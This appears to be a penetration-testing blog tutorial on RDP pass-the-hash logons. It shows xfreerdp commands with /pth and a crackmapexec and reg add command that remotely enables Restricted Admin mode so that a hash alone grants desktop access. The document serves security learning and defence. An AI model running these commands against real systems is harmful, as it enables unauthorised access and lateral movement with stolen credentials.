RDP : Pass-the-Hash Login (no Password)

If you have completed a password "audit" (a non-technical way of saying you have "cracked passwords") you are often left with hashes, obtained from a SAM dump or an Active Directory ntds.dit dump, that did not crack.

Note : This is why protecting the SAM and ntds.dit from these types of attacks is so important. Without the hashes there is nothing to pass, and xfreerdp cannot connect to a server with a hash you do not have.

Note : This is for educational and learning purposes and should be done in a "lab" for your own knowledge and development.

So you may hit an example where you cannot "crack" the password to get the clear-text ASCII password because people have been "security vigilant" (long, random passwords). For cases like that what you can do is pass-the-hash (PtH): NTLM authenticates with the NT hash itself, so the hash is all you need, the password is never required.

Classic Remote Desktop

If you want "Remote Desktop" access with only the hash, the standard Windows RDP client (mstsc.exe) shown below will not do, as it requires the username and the password:


xfreerdp : PtH Supported

However, you can use xfreerdp, which ships with Kali, and it will give you an RDP desktop without the password. On another Debian-based distro install it with the following (newer Debian, Ubuntu and Kali releases name the package freerdp2-x11):

apt-get update
apt-get install freerdp-x11

Then we need this command, which connects to the computer called hack.me as the user "pth.user" in the domain "bear.local", passing the NT hash with /pth. The /pth option takes the bare NT hash, the 32 hex character NT half of the LM:NT pair as printed by secretsdump or mimikatz, not the whole pair; the value below is shortened:

xfreerdp /u:pth.user /d:bear.local /pth:8846a85c584453c337827 /v:hack.me

Restricted Admin Mode : Danger, there be dragons

The catch is a feature called "Restricted Admin Mode". The /pth option logs on in Restricted Admin mode, and that mode is disabled by default on Windows 8.1 / Server 2012 R2 and later (and on Windows 7 / Server 2008 R2 once KB2871997 is installed), so the PtH attempt is refused with an account-restriction error like this:


Not to mention an entry in the event log like this, which clearly flags "restricted admin mode":


Excellent, Windows is protecting me against PtH attacks, that's good isn't it? Not quite: Restricted Admin mode was built to protect the administrator's credentials (they are never sent to the remote host), and the side-effect of switching it on is that the NT hash alone is enough to log on. It is leaving the mode off that blocks PtH over RDP, and anyone with admin rights on the box can switch it on.

Enabling "Restricted Admin Mode" and putting the dragon back to sleep

Scenario 1 : You have no interactive access and need to use the hash to get access

Yes, this is Windows, so there is a way round this. Because the account has admin access to the server you can flip the setting remotely, but only with a utility that itself supports PtH, such as "crackmapexec" (more on that here). Once it is installed on Kali the command looks like this:

Note : You need a utility that supports PtH because you do not know the password, and the account must have local admin rights on the target, since this writes under HKLM.

crackmapexec smb hack.me -d bear.local -u "pth.user" -H "8846a85c584453c337827" -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'

Once this command has been issued (DisableRestrictedAdmin = 0 turns Restricted Admin mode on) you can connect with xfreerdp to the target server using PtH and NOT the password. When you are done in the lab, set the value back to 1 or delete it: while it is 0 the server accepts hash-only RDP logons from anyone holding an admin hash.

Scenario 2 : You already have access to the device and can add registry keys

That makes it easier: you can set the value locally with "reg add" (or remotely, since reg.exe accepts a \\hack.me\HKLM\... path when the Remote Registry service on the target is reachable):

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Registry Key Added, xfreerdp away

When this value is set you should be able to connect from Kali to the target machine using only the hash, without the password:

xfreerdp /u:pth.user /d:bear.local /pth:8846a85c584453c337827 /v:hack.me

One caveat of a Restricted Admin session: because the user's credentials never reach the server, anything you run inside that desktop that talks to other hosts authenticates as the computer account, not as pth.user, so you cannot hop onwards with the user's identity from there.
